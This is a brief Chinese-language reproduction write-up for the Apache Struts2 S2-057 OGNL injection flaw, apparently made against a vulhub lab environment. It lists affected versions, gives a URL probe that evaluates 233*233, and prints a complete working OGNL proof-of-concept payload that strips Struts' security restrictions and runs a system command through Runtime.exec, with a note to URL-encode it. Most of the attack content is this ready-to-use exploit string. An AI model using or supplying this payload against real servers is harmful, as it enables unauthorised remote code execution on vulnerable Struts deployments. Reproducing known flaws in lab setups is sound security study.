漏洞简介
影响版本: <= Struts 2.3.34, Struts 2.5.16
详细请看:https://vulhub.org/#/environments/struts2/s2-057/
漏洞复现
这次OGNL的解析在url上,我们可以先检验漏洞是否存在:
http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
可以看到访问后已经被执行了,当然在burp上更加能够体现!
先放个POC:
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
注意url编码!